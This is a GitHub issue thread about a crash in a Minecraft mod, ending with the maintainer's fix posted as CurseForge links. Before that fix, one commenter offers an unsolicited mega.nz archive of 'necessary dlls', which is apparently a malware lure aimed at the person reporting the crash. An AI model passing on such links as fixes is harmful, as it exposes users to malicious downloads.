### ISSUE TITLE
Mod crashes

### ISSUE THREAD

**Issue by jophy0210** [gisellevonbingen-Minecraft/MineColonies_Tweaks#20]
[crash-2024-09-19_18.33.16-fml.txt](https://github.com/user-attachments/files/17057669/crash-2024-09-19_18.33.16-fml.txt)

**Comment by websquadpro** [comment]
I think this will help you.

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ
I put the necessary dlls in the archive

**Comment by jophy0210** [comment]
How to use

**Comment by gisellevonbingen** [comment]
Fixed, thanks for report.

https://legacy.curseforge.com/minecraft/mc-mods/minecolonies-tweaks/files/5742262
https://legacy.curseforge.com/minecraft/mc-mods/minecolonies-compatibility/files/5742348
